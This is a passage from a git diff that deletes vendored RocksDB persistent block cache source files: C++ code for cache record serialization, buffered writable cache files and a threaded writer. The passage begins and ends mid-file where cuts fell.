-    opt.writer_dispatch_size = 4 * 1024;
-  }
-
-  auto pcache = std::make_shared<BlockCacheTier>(opt);
-  Status s = pcache->Open();
-
-  if (!s.ok()) {
-    return s;
-  }
-
-  *cache = pcache;
-  return s;
-}
-
-}  // namespace rocksdb
-
-#endif  // ifndef ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier.h b/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier.h
deleted file mode 100644
index 9a8dec3..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier.h
+++ /dev/null
@@ -1,156 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#ifndef  OS_WIN
-#include <unistd.h>
-#endif // ! OS_WIN
-
-#include <atomic>
-#include <list>
-#include <memory>
-#include <set>
-#include <sstream>
-#include <stdexcept>
-#include <string>
-#include <thread>
-
-#include "rocksdb/cache.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/persistent_cache.h"
-
-#include "utilities/persistent_cache/block_cache_tier_file.h"
-#include "utilities/persistent_cache/block_cache_tier_metadata.h"
-#include "utilities/persistent_cache/persistent_cache_util.h"
-
-#include "memtable/skiplist.h"
-#include "monitoring/histogram.h"
-#include "port/port.h"
-#include "util/arena.h"
-#include "util/coding.h"
-#include "util/crc32c.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-//
-// Block cache tier implementation
-//
-class BlockCacheTier : public PersistentCacheTier {
- public:
-  explicit BlockCacheTier(const PersistentCacheConfig& opt)
-      : opt_(opt),
-        insert_ops_(opt_.max_write_pipeline_backlog_size),
-        buffer_allocator_(opt.write_buffer_size, opt.write_buffer_count()),
-        writer_(this, opt_.writer_qdepth, opt_.writer_dispatch_size) {
-    Info(opt_.log, "Initializing allocator. size=%d B count=%d",
-         opt_.write_buffer_size, opt_.write_buffer_count());
-  }
-
-  virtual ~BlockCacheTier() {
-    // Close is re-entrant so we can call close even if it is already closed
-    Close();
-    assert(!insert_th_.joinable());
-  }
-
-  Status Insert(const Slice& key, const char* data, const size_t size) override;
-  Status Lookup(const Slice& key, std::unique_ptr<char[]>* data,
-                size_t* size) override;
-  Status Open() override;
-  Status Close() override;
-  bool Erase(const Slice& key) override;
-  bool Reserve(const size_t size) override;
-
-  bool IsCompressed() override { return opt_.is_compressed; }
-
-  std::string GetPrintableOptions() const override { return opt_.ToString(); }
-
-  PersistentCache::StatsType Stats() override;
-
-  void TEST_Flush() override {
-    while (insert_ops_.Size()) {
-      /* sleep override */
-      Env::Default()->SleepForMicroseconds(1000000);
-    }
-  }
-
- private:
-  // Percentage of cache to be evicted when the cache is full
-  static const size_t kEvictPct = 10;
-  // Max attempts to insert key, value to cache in pipelined mode
-  static const size_t kMaxRetry = 3;
-
-  // Pipelined operation
-  struct InsertOp {
-    explicit InsertOp(const bool signal) : signal_(signal) {}
-    explicit InsertOp(std::string&& key, const std::string& data)
-        : key_(std::move(key)), data_(data) {}
-    ~InsertOp() {}
-
-    InsertOp() = delete;
-    InsertOp(InsertOp&& rhs) = default;
-    InsertOp& operator=(InsertOp&& rhs) = default;
-
-    // used for estimating size by bounded queue
-    size_t Size() { return data_.size() + key_.size(); }
-
-    std::string key_;
-    std::string data_;
-    const bool signal_ = false;  // signal to request processing thread to exit
-  };
-
-  // entry point for insert thread
-  void InsertMain();
-  // insert implementation
-  Status InsertImpl(const Slice& key, const Slice& data);
-  // Create a new cache file
-  Status NewCacheFile();
-  // Get cache directory path
-  std::string GetCachePath() const { return opt_.path + "/cache"; }
-  // Cleanup folder
-  Status CleanupCacheFolder(const std::string& folder);
-
-  // Statistics
-  struct Statistics {
-    HistogramImpl bytes_pipelined_;
-    HistogramImpl bytes_written_;
-    HistogramImpl bytes_read_;
-    HistogramImpl read_hit_latency_;
-    HistogramImpl read_miss_latency_;
-    HistogramImpl write_latency_;
-    std::atomic<uint64_t> cache_hits_{0};
-    std::atomic<uint64_t> cache_misses_{0};
-    std::atomic<uint64_t> cache_errors_{0};
-    std::atomic<uint64_t> insert_dropped_{0};
-
-    double CacheHitPct() const {
-      const auto lookups = cache_hits_ + cache_misses_;
-      return lookups ? 100 * cache_hits_ / static_cast<double>(lookups) : 0.0;
-    }
-
-    double CacheMissPct() const {
-      const auto lookups = cache_hits_ + cache_misses_;
-      return lookups ? 100 * cache_misses_ / static_cast<double>(lookups) : 0.0;
-    }
-  };
-
-  port::RWMutex lock_;                          // Synchronization
-  const PersistentCacheConfig opt_;             // BlockCache options
-  BoundedQueue<InsertOp> insert_ops_;           // Ops waiting for insert
-  rocksdb::port::Thread insert_th_;                       // Insert thread
-  uint32_t writer_cache_id_ = 0;                // Current cache file identifier
-  WriteableCacheFile* cache_file_ = nullptr;    // Current cache file reference
-  CacheWriteBufferAllocator buffer_allocator_;  // Buffer provider
-  ThreadedWriter writer_;                       // Writer threads
-  BlockCacheTierMetadata metadata_;             // Cache meta data manager
-  std::atomic<uint64_t> size_{0};               // Size of the cache
-  Statistics stats_;                                 // Statistics
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file.cc b/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file.cc
deleted file mode 100644
index 85e0610..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file.cc
+++ /dev/null
@@ -1,593 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#include "utilities/persistent_cache/block_cache_tier_file.h"
-
-#ifndef OS_WIN
-#include <unistd.h>
-#endif
-#include <functional>
-#include <memory>
-#include <vector>
-
-#include "port/port.h"
-#include "util/crc32c.h"
-#include "util/logging.h"
-
-namespace rocksdb {
-
-//
-// File creation factories
-//
-Status NewWritableCacheFile(Env* const env, const std::string& filepath,
-                            std::unique_ptr<WritableFile>* file,
-                            const bool use_direct_writes = false) {
-  EnvOptions opt;
-  opt.use_direct_writes = use_direct_writes;
-  Status s = env->NewWritableFile(filepath, file, opt);
-  return s;
-}
-
-Status NewRandomAccessCacheFile(Env* const env, const std::string& filepath,
-                                std::unique_ptr<RandomAccessFile>* file,
-                                const bool use_direct_reads = true) {
-  EnvOptions opt;
-  opt.use_direct_reads = use_direct_reads;
-  Status s = env->NewRandomAccessFile(filepath, file, opt);
-  return s;
-}
-
-//
-// BlockCacheFile
-//
-Status BlockCacheFile::Delete(uint64_t* size) {
-  Status status = env_->GetFileSize(Path(), size);
-  if (!status.ok()) {
-    return status;
-  }
-  return env_->DeleteFile(Path());
-}
-
-//
-// CacheRecord
-//
-// Cache record represents the record on disk
-//
-// +--------+---------+----------+------------+---------------+-------------+
-// | magic  | crc     | key size | value size | key data      | value data  |
-// +--------+---------+----------+------------+---------------+-------------+
-// <-- 4 --><-- 4  --><-- 4   --><-- 4     --><-- key size  --><-- v-size -->
-//
-struct CacheRecordHeader {
-  CacheRecordHeader() {}
-  CacheRecordHeader(const uint32_t magic, const uint32_t key_size,
-                    const uint32_t val_size)
-      : magic_(magic), crc_(0), key_size_(key_size), val_size_(val_size) {}
-
-  uint32_t magic_;
-  uint32_t crc_;
-  uint32_t key_size_;
-  uint32_t val_size_;
-};
-
-struct CacheRecord {
-  CacheRecord() {}
-  CacheRecord(const Slice& key, const Slice& val)
-      : hdr_(MAGIC, static_cast<uint32_t>(key.size()),
-             static_cast<uint32_t>(val.size())),
-        key_(key),
-        val_(val) {
-    hdr_.crc_ = ComputeCRC();
-  }
-
-  uint32_t ComputeCRC() const;
-  bool Serialize(std::vector<CacheWriteBuffer*>* bufs, size_t* woff);
-  bool Deserialize(const Slice& buf);
-
-  static uint32_t CalcSize(const Slice& key, const Slice& val) {
-    return static_cast<uint32_t>(sizeof(CacheRecordHeader) + key.size() +
-                                 val.size());
-  }
-
-  static const uint32_t MAGIC = 0xfefa;
-
-  bool Append(std::vector<CacheWriteBuffer*>* bufs, size_t* woff,
-              const char* data, const size_t size);
-
-  CacheRecordHeader hdr_;
-  Slice key_;
-  Slice val_;
-};
-
-static_assert(sizeof(CacheRecordHeader) == 16, "DataHeader is not aligned");
-
-uint32_t CacheRecord::ComputeCRC() const {
-  uint32_t crc = 0;
-  CacheRecordHeader tmp = hdr_;
-  tmp.crc_ = 0;
-  crc = crc32c::Extend(crc, reinterpret_cast<const char*>(&tmp), sizeof(tmp));
-  crc = crc32c::Extend(crc, reinterpret_cast<const char*>(key_.data()),
-                       key_.size());
-  crc = crc32c::Extend(crc, reinterpret_cast<const char*>(val_.data()),
-                       val_.size());
-  return crc;
-}
-
-bool CacheRecord::Serialize(std::vector<CacheWriteBuffer*>* bufs,
-                            size_t* woff) {
-  assert(bufs->size());
-  return Append(bufs, woff, reinterpret_cast<const char*>(&hdr_),
-                sizeof(hdr_)) &&
-         Append(bufs, woff, reinterpret_cast<const char*>(key_.data()),
-                key_.size()) &&
-         Append(bufs, woff, reinterpret_cast<const char*>(val_.data()),
-                val_.size());
-}
-
-bool CacheRecord::Append(std::vector<CacheWriteBuffer*>* bufs, size_t* woff,
-                         const char* data, const size_t data_size) {
-  assert(*woff < bufs->size());
-
-  const char* p = data;
-  size_t size = data_size;
-
-  while (size && *woff < bufs->size()) {
-    CacheWriteBuffer* buf = (*bufs)[*woff];
-    const size_t free = buf->Free();
-    if (size <= free) {
-      buf->Append(p, size);
-      size = 0;
-    } else {
-      buf->Append(p, free);
-      p += free;
-      size -= free;
-      assert(!buf->Free());
-      assert(buf->Used() == buf->Capacity());
-    }
-
-    if (!buf->Free()) {
-      *woff += 1;
-    }
-  }
-
-  assert(!size);
-
-  return !size;
-}
-
-bool CacheRecord::Deserialize(const Slice& data) {
-  assert(data.size() >= sizeof(CacheRecordHeader));
-  if (data.size() < sizeof(CacheRecordHeader)) {
-    return false;
-  }
-
-  memcpy(&hdr_, data.data(), sizeof(hdr_));
-
-  assert(hdr_.key_size_ + hdr_.val_size_ + sizeof(hdr_) == data.size());
-  if (hdr_.key_size_ + hdr_.val_size_ + sizeof(hdr_) != data.size()) {
-    return false;
-  }
-
-  key_ = Slice(data.data_ + sizeof(hdr_), hdr_.key_size_);
-  val_ = Slice(key_.data_ + hdr_.key_size_, hdr_.val_size_);
-
-  if (!(hdr_.magic_ == MAGIC && ComputeCRC() == hdr_.crc_)) {
-    fprintf(stderr, "** magic %d ** \n", hdr_.magic_);
-    fprintf(stderr, "** key_size %d ** \n", hdr_.key_size_);
-    fprintf(stderr, "** val_size %d ** \n", hdr_.val_size_);
-    fprintf(stderr, "** key %s ** \n", key_.ToString().c_str());
-    fprintf(stderr, "** val %s ** \n", val_.ToString().c_str());
-    for (size_t i = 0; i < hdr_.val_size_; ++i) {
-      fprintf(stderr, "%d.", (uint8_t)val_.data()[i]);
-    }
-    fprintf(stderr, "\n** cksum %d != %d **", hdr_.crc_, ComputeCRC());
-  }
-
-  assert(hdr_.magic_ == MAGIC && ComputeCRC() == hdr_.crc_);
-  return hdr_.magic_ == MAGIC && ComputeCRC() == hdr_.crc_;
-}
-
-//
-// RandomAccessFile
-//
-
-bool RandomAccessCacheFile::Open(const bool enable_direct_reads) {
-  WriteLock _(&rwlock_);
-  return OpenImpl(enable_direct_reads);
-}
-
-bool RandomAccessCacheFile::OpenImpl(const bool enable_direct_reads) {
-  rwlock_.AssertHeld();
-
-  ROCKS_LOG_DEBUG(log_, "Opening cache file %s", Path().c_str());
-
-  std::unique_ptr<RandomAccessFile> file;
-  Status status =
-      NewRandomAccessCacheFile(env_, Path(), &file, enable_direct_reads);
-  if (!status.ok()) {
-    Error(log_, "Error opening random access file %s. %s", Path().c_str(),
-          status.ToString().c_str());
-    return false;
-  }
-  freader_.reset(new RandomAccessFileReader(std::move(file), Path(), env_));
-
-  return true;
-}
-
-bool RandomAccessCacheFile::Read(const LBA& lba, Slice* key, Slice* val,
-                                 char* scratch) {
-  ReadLock _(&rwlock_);
-
-  assert(lba.cache_id_ == cache_id_);
-
-  if (!freader_) {
-    return false;
-  }
-
-  Slice result;
-  Status s = freader_->Read(lba.off_, lba.size_, &result, scratch);
-  if (!s.ok()) {
-    Error(log_, "Error reading from file %s. %s", Path().c_str(),
-          s.ToString().c_str());
-    return false;
-  }
-
-  assert(result.data() == scratch);
-
-  return ParseRec(lba, key, val, scratch);
-}
-
-bool RandomAccessCacheFile::ParseRec(const LBA& lba, Slice* key, Slice* val,
-                                     char* scratch) {
-  Slice data(scratch, lba.size_);
-
-  CacheRecord rec;
-  if (!rec.Deserialize(data)) {
-    assert(!"Error deserializing data");
-    Error(log_, "Error de-serializing record from file %s off %d",
-          Path().c_str(), lba.off_);
-    return false;
-  }
-
-  *key = Slice(rec.key_);
-  *val = Slice(rec.val_);
-
-  return true;
-}
-
-//
-// WriteableCacheFile
-//
-
-WriteableCacheFile::~WriteableCacheFile() {
-  WriteLock _(&rwlock_);
-  if (!eof_) {
-    // This file never flushed. We give priority to shutdown since this is a
-    // cache
-    // TODO(krad): Figure a way to flush the pending data
-    if (file_) {
-      assert(refs_ == 1);
-      --refs_;
-    }
-  }
-  assert(!refs_);
-  ClearBuffers();
-}
-
-bool WriteableCacheFile::Create(const bool enable_direct_writes,
-                                const bool enable_direct_reads) {
-  WriteLock _(&rwlock_);
-
-  enable_direct_reads_ = enable_direct_reads;
-
-  ROCKS_LOG_DEBUG(log_, "Creating new cache %s (max size is %d B)",
-                  Path().c_str(), max_size_);
-
-  Status s = env_->FileExists(Path());
-  if (s.ok()) {
-    ROCKS_LOG_WARN(log_, "File %s already exists. %s", Path().c_str(),
-                   s.ToString().c_str());
-  }
-
-  s = NewWritableCacheFile(env_, Path(), &file_);
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(log_, "Unable to create file %s. %s", Path().c_str(),
-                   s.ToString().c_str());
-    return false;
-  }
-
-  assert(!refs_);
-  ++refs_;
-
-  return true;
-}
-
-bool WriteableCacheFile::Append(const Slice& key, const Slice& val, LBA* lba) {
-  WriteLock _(&rwlock_);
-
-  if (eof_) {
-    // We can't append since the file is full
-    return false;
-  }
-
-  // estimate the space required to store the (key, val)
-  uint32_t rec_size = CacheRecord::CalcSize(key, val);
-
-  if (!ExpandBuffer(rec_size)) {
-    // unable to expand the buffer
-    ROCKS_LOG_DEBUG(log_, "Error expanding buffers. size=%d", rec_size);
-    return false;
-  }
-
-  lba->cache_id_ = cache_id_;
-  lba->off_ = disk_woff_;
-  lba->size_ = rec_size;
-
-  CacheRecord rec(key, val);
-  if (!rec.Serialize(&bufs_, &buf_woff_)) {
-    // unexpected error: unable to serialize the data
-    assert(!"Error serializing record");
-    return false;
-  }
-
-  disk_woff_ += rec_size;
-  eof_ = disk_woff_ >= max_size_;
-
-  // dispatch buffer for flush
-  DispatchBuffer();
-
-  return true;
-}
-
-bool WriteableCacheFile::ExpandBuffer(const size_t size) {
-  rwlock_.AssertHeld();
-  assert(!eof_);
-
-  // determine if there is enough space
-  size_t free = 0;  // compute the free space left in buffer
-  for (size_t i = buf_woff_; i < bufs_.size(); ++i) {
-    free += bufs_[i]->Free();
-    if (size <= free) {
-      // we have enough space in the buffer
-      return true;
-    }
-  }
-
-  // expand the buffer until there is enough space to write `size` bytes
-  assert(free < size);
-  while (free < size) {
-    CacheWriteBuffer* const buf = alloc_->Allocate();
-    if (!buf) {
-      ROCKS_LOG_DEBUG(log_, "Unable to allocate buffers");
-      return false;
-    }
-
-    size_ += static_cast<uint32_t>(buf->Free());
-    free += buf->Free();
-    bufs_.push_back(buf);
-  }
-
-  assert(free >= size);
-  return true;
-}
-
-void WriteableCacheFile::DispatchBuffer() {
-  rwlock_.AssertHeld();
-
-  assert(bufs_.size());
-  assert(buf_doff_ <= buf_woff_);
-  assert(buf_woff_ <= bufs_.size());
-
-  if (pending_ios_) {
-    return;
-  }
-
-  if (!eof_ && buf_doff_ == buf_woff_) {
-    // dispatch buffer is pointing to write buffer and we haven't hit eof
-    return;
-  }
-
-  assert(eof_ || buf_doff_ < buf_woff_);
-  assert(buf_doff_ < bufs_.size());
-  assert(file_);
-
-  auto* buf = bufs_[buf_doff_];
-  const uint64_t file_off = buf_doff_ * alloc_->BufferSize();
-
-  assert(!buf->Free() ||
-         (eof_ && buf_doff_ == buf_woff_ && buf_woff_ < bufs_.size()));
-  // we have reached end of file, and there is space in the last buffer
-  // pad it with zero for direct IO
-  buf->FillTrailingZeros();
-
-  assert(buf->Used() % kFileAlignmentSize == 0);
-
-  writer_->Write(file_.get(), buf, file_off,
-                 std::bind(&WriteableCacheFile::BufferWriteDone, this));
-  pending_ios_++;
-  buf_doff_++;
-}
-
-void WriteableCacheFile::BufferWriteDone() {
-  WriteLock _(&rwlock_);
-
-  assert(bufs_.size());
-
-  pending_ios_--;
-
-  if (buf_doff_ < bufs_.size()) {
-    DispatchBuffer();
-  }
-
-  if (eof_ && buf_doff_ >= bufs_.size() && !pending_ios_) {
-    // end-of-file reached, move to read mode
-    CloseAndOpenForReading();
-  }
-}
-
-void WriteableCacheFile::CloseAndOpenForReading() {
-  // Our env abstraction do not allow reading from a file opened for appending
-  // We need close the file and re-open it for reading
-  Close();
-  RandomAccessCacheFile::OpenImpl(enable_direct_reads_);
-}
-
-bool WriteableCacheFile::ReadBuffer(const LBA& lba, Slice* key, Slice* block,
-                                    char* scratch) {
-  rwlock_.AssertHeld();
-
-  if (!ReadBuffer(lba, scratch)) {
-    Error(log_, "Error reading from buffer. cache=%d off=%d", cache_id_,
-          lba.off_);
-    return false;
-  }
-
-  return ParseRec(lba, key, block, scratch);
-}
-
-bool WriteableCacheFile::ReadBuffer(const LBA& lba, char* data) {
-  rwlock_.AssertHeld();
-
-  assert(lba.off_ < disk_woff_);
-
-  // we read from the buffers like reading from a flat file. The list of buffers
-  // are treated as contiguous stream of data
-
-  char* tmp = data;
-  size_t pending_nbytes = lba.size_;
-  // start buffer
-  size_t start_idx = lba.off_ / alloc_->BufferSize();
-  // offset into the start buffer
-  size_t start_off = lba.off_ % alloc_->BufferSize();
-
-  assert(start_idx <= buf_woff_);
-
-  for (size_t i = start_idx; pending_nbytes && i < bufs_.size(); ++i) {
-    assert(i <= buf_woff_);
-    auto* buf = bufs_[i];
-    assert(i == buf_woff_ || !buf->Free());
-    // bytes to write to the buffer
-    size_t nbytes = pending_nbytes > (buf->Used() - start_off)
-                        ? (buf->Used() - start_off)
-                        : pending_nbytes;
-    memcpy(tmp, buf->Data() + start_off, nbytes);
-
-    // left over to be written
-    pending_nbytes -= nbytes;
-    start_off = 0;
-    tmp += nbytes;
-  }
-
-  assert(!pending_nbytes);
-  if (pending_nbytes) {
-    return false;
-  }
-
-  assert(tmp == data + lba.size_);
-  return true;
-}
-
-void WriteableCacheFile::Close() {
-  rwlock_.AssertHeld();
-
-  assert(size_ >= max_size_);
-  assert(disk_woff_ >= max_size_);
-  assert(buf_doff_ == bufs_.size());
-  assert(bufs_.size() - buf_woff_ <= 1);
-  assert(!pending_ios_);
-
-  Info(log_, "Closing file %s. size=%d written=%d", Path().c_str(), size_,
-       disk_woff_);
-
-  ClearBuffers();
-  file_.reset();
-
-  assert(refs_);
-  --refs_;
-}
-
-void WriteableCacheFile::ClearBuffers() {
-  for (size_t i = 0; i < bufs_.size(); ++i) {
-    alloc_->Deallocate(bufs_[i]);
-  }
-
-  bufs_.clear();
-}
-
-//
-// ThreadedFileWriter implementation
-//
-ThreadedWriter::ThreadedWriter(PersistentCacheTier* const cache,
-                               const size_t qdepth, const size_t io_size)
-    : Writer(cache), io_size_(io_size) {
-  for (size_t i = 0; i < qdepth; ++i) {
-    port::Thread th(&ThreadedWriter::ThreadMain, this);
-    threads_.push_back(std::move(th));
-  }
-}
-
-void ThreadedWriter::Stop() {
-  // notify all threads to exit
-  for (size_t i = 0; i < threads_.size(); ++i) {
-    q_.Push(IO(/*signal=*/true));
-  }
-
-  // wait for all threads to exit
-  for (auto& th : threads_) {
-    th.join();
-    assert(!th.joinable());
-  }
-  threads_.clear();
-}
-
-void ThreadedWriter::Write(WritableFile* const file, CacheWriteBuffer* buf,
-                           const uint64_t file_off,
-                           const std::function<void()> callback) {
-  q_.Push(IO(file, buf, file_off, callback));
-}
-
-void ThreadedWriter::ThreadMain() {
-  while (true) {
-    // Fetch the IO to process
-    IO io(q_.Pop());
-    if (io.signal_) {
-      // that's secret signal to exit
-      break;
-    }
-
-    // Reserve space for writing the buffer
-    while (!cache_->Reserve(io.buf_->Used())) {
-      // We can fail to reserve space if every file in the system
-      // is being currently accessed
-      /* sleep override */
-      Env::Default()->SleepForMicroseconds(1000000);
-    }
-
-    DispatchIO(io);
-
-    io.callback_();
-  }
-}
-
-void ThreadedWriter::DispatchIO(const IO& io) {
-  size_t written = 0;
-  while (written < io.buf_->Used()) {
-    Slice data(io.buf_->Data() + written, io_size_);
-    Status s = io.file_->Append(data);
-    assert(s.ok());
-    if (!s.ok()) {
-      // That is definite IO error to device. There is not much we can
-      // do but ignore the failure. This can lead to corruption of data on
-      // disk, but the cache will skip while reading
-      fprintf(stderr, "Error writing data to file. %s\n", s.ToString().c_str());
-    }
-    written += io_size_;
-  }
-}
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file.h b/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file.h
deleted file mode 100644
index 3922136..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file.h
+++ /dev/null
@@ -1,293 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <list>
-#include <memory>
-#include <string>
-#include <vector>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-
-#include "utilities/persistent_cache/block_cache_tier_file_buffer.h"
-#include "utilities/persistent_cache/lrulist.h"
-#include "utilities/persistent_cache/persistent_cache_tier.h"
-#include "utilities/persistent_cache/persistent_cache_util.h"
-
-#include "port/port.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-#include "util/mutexlock.h"
-
-// The io code path of persistent cache uses pipelined architecture
-//
-// client -> In Queue <-- BlockCacheTier --> Out Queue <-- Writer <--> Kernel
-//
-// This would enable the system to scale for GB/s of throughput which is
-// expected with modern devies like NVM.
-//
-// The file level operations are encapsulated in the following abstractions
-//
-// BlockCacheFile
-//       ^
-//       |
-//       |
-// RandomAccessCacheFile (For reading)
-//       ^
-//       |
-//       |
-// WriteableCacheFile (For writing)
-//
-// Write IO code path :
-//
-namespace rocksdb {
-
-class WriteableCacheFile;
-struct BlockInfo;
-
-// Represents a logical record on device
-//
-// (L)ogical (B)lock (Address = { cache-file-id, offset, size }
-struct LogicalBlockAddress {
-  LogicalBlockAddress() {}
-  explicit LogicalBlockAddress(const uint32_t cache_id, const uint32_t off,
-                               const uint16_t size)
-      : cache_id_(cache_id), off_(off), size_(size) {}
-
-  uint32_t cache_id_ = 0;
-  uint32_t off_ = 0;
-  uint32_t size_ = 0;
-};
-
-typedef LogicalBlockAddress LBA;
-
-// class Writer
-//
-// Writer is the abstraction used for writing data to file. The component can be
-// multithreaded. It is the last step of write pipeline
-class Writer {
- public:
-  explicit Writer(PersistentCacheTier* const cache) : cache_(cache) {}
-  virtual ~Writer() {}
-
-  // write buffer to file at the given offset
-  virtual void Write(WritableFile* const file, CacheWriteBuffer* buf,
-                     const uint64_t file_off,
-                     const std::function<void()> callback) = 0;
-  // stop the writer
-  virtual void Stop() = 0;
-
-  PersistentCacheTier* const cache_;
-};
-
-// class BlockCacheFile
-//
-// Generic interface to support building file specialized for read/writing
-class BlockCacheFile : public LRUElement<BlockCacheFile> {
- public:
-  explicit BlockCacheFile(const uint32_t cache_id)
-      : LRUElement<BlockCacheFile>(), cache_id_(cache_id) {}
-
-  explicit BlockCacheFile(Env* const env, const std::string& dir,
-                          const uint32_t cache_id)
-      : LRUElement<BlockCacheFile>(),
-        env_(env),
-        dir_(dir),
-        cache_id_(cache_id) {}
-
-  virtual ~BlockCacheFile() {}
-
-  // append key/value to file and return LBA locator to user
-  virtual bool Append(const Slice& key, const Slice& val, LBA* const lba) {
-    assert(!"not implemented");
-    return false;
-  }
-
-  // read from the record locator (LBA) and return key, value and status
-  virtual bool Read(const LBA& lba, Slice* key, Slice* block, char* scratch) {
-    assert(!"not implemented");
-    return false;
-  }
-
-  // get file path
-  std::string Path() const {
-    return dir_ + "/" + std::to_string(cache_id_) + ".rc";
-  }
-  // get cache ID
-  uint32_t cacheid() const { return cache_id_; }
-  // Add block information to file data
-  // Block information is the list of index reference for this file
-  virtual void Add(BlockInfo* binfo) {
-    WriteLock _(&rwlock_);
-    block_infos_.push_back(binfo);
-  }
-  // get block information
-  std::list<BlockInfo*>& block_infos() { return block_infos_; }
-  // delete file and return the size of the file
-  virtual Status Delete(uint64_t* size);
-
- protected:
-  port::RWMutex rwlock_;               // synchronization mutex
-  Env* const env_ = nullptr;           // Env for IO
-  const std::string dir_;              // Directory name
-  const uint32_t cache_id_;            // Cache id for the file
-  std::list<BlockInfo*> block_infos_;  // List of index entries mapping to the
-                                       // file content
-};
-
-// class RandomAccessFile
-//
-// Thread safe implementation for reading random data from file
-class RandomAccessCacheFile : public BlockCacheFile {
- public:
-  explicit RandomAccessCacheFile(Env* const env, const std::string& dir,
-                                 const uint32_t cache_id,
-                                 const shared_ptr<Logger>& log)
-      : BlockCacheFile(env, dir, cache_id), log_(log) {}
-
-  virtual ~RandomAccessCacheFile() {}
-
-  // open file for reading
-  bool Open(const bool enable_direct_reads);
-  // read data from the disk
-  bool Read(const LBA& lba, Slice* key, Slice* block, char* scratch) override;
-
- private:
-  std::unique_ptr<RandomAccessFileReader> freader_;
-
- protected:
-  bool OpenImpl(const bool enable_direct_reads);
-  bool ParseRec(const LBA& lba, Slice* key, Slice* val, char* scratch);
-
-  std::shared_ptr<Logger> log_;  // log file
-};
-
-// class WriteableCacheFile
-//
-// All writes to the files are cached in buffers. The buffers are flushed to
-// disk as they get filled up. When file size reaches a certain size, a new file
-// will be created provided there is free space
-class WriteableCacheFile : public RandomAccessCacheFile {
- public:
-  explicit WriteableCacheFile(Env* const env, CacheWriteBufferAllocator* alloc,
-                              Writer* writer, const std::string& dir,
-                              const uint32_t cache_id, const uint32_t max_size,
-                              const std::shared_ptr<Logger>& log)
-      : RandomAccessCacheFile(env, dir, cache_id, log),
-        alloc_(alloc),
-        writer_(writer),
-        max_size_(max_size) {}
-
-  virtual ~WriteableCacheFile();
-
-  // create file on disk
-  bool Create(const bool enable_direct_writes, const bool enable_direct_reads);
-
-  // read data from logical file
-  bool Read(const LBA& lba, Slice* key, Slice* block, char* scratch) override {
-    ReadLock _(&rwlock_);
-    const bool closed = eof_ && bufs_.empty();
-    if (closed) {
-      // the file is closed, read from disk
-      return RandomAccessCacheFile::Read(lba, key, block, scratch);
-    }
-    // file is still being written, read from buffers
-    return ReadBuffer(lba, key, block, scratch);
-  }
-
-  // append data to end of file
-  bool Append(const Slice&, const Slice&, LBA* const) override;
-  // End-of-file
-  bool Eof() const { return eof_; }
-
- private:
-  friend class ThreadedWriter;
-
-  static const size_t kFileAlignmentSize = 4 * 1024;  // align file size
-
-  bool ReadBuffer(const LBA& lba, Slice* key, Slice* block, char* scratch);
-  bool ReadBuffer(const LBA& lba, char* data);
-  bool ExpandBuffer(const size_t size);
-  void DispatchBuffer();
-  void BufferWriteDone();
-  void CloseAndOpenForReading();
-  void ClearBuffers();
-  void Close();
-
-  // File layout in memory
-  //
-  // +------+------+------+------+------+------+
-  // | b0   | b1   | b2   | b3   | b4   | b5   |
-  // +------+------+------+------+------+------+
-  //        ^                           ^
-  //        |                           |
-  //      buf_doff_                   buf_woff_
-  //   (next buffer to           (next buffer to fill)
-  //   flush to disk)
-  //
-  //  The buffers are flushed to disk serially for a given file
-
-  CacheWriteBufferAllocator* const alloc_ = nullptr;  // Buffer provider
-  Writer* const writer_ = nullptr;                    // File writer thread
-  std::unique_ptr<WritableFile> file_;   // RocksDB Env file abstraction
-  std::vector<CacheWriteBuffer*> bufs_;  // Written buffers
-  uint32_t size_ = 0;                    // Size of the file
-  const uint32_t max_size_;              // Max size of the file
-  bool eof_ = false;                     // End of file
-  uint32_t disk_woff_ = 0;               // Offset to write on disk
-  size_t buf_woff_ = 0;                  // off into bufs_ to write
-  size_t buf_doff_ = 0;                  // off into bufs_ to dispatch
-  size_t pending_ios_ = 0;               // Number of ios to disk in-progress
-  bool enable_direct_reads_ = false;     // Should we enable direct reads
-                                         // when reading from disk
-};
-
-//
-// Abstraction to do writing to device. It is part of pipelined architecture.
-//
-class ThreadedWriter : public Writer {
- public:
-  // Representation of IO to device
-  struct IO {
-    explicit IO(const bool signal) : signal_(signal) {}
-    explicit IO(WritableFile* const file, CacheWriteBuffer* const buf,
-                const uint64_t file_off, const std::function<void()> callback)
-        : file_(file), buf_(buf), file_off_(file_off), callback_(callback) {}
-
-    IO(const IO&) = default;
-    IO& operator=(const IO&) = default;
-    size_t Size() const { return sizeof(IO); }
-
-    WritableFile* file_ = nullptr;           // File to write to
-    CacheWriteBuffer* const buf_ = nullptr;  // buffer to write
-    uint64_t file_off_ = 0;                  // file offset
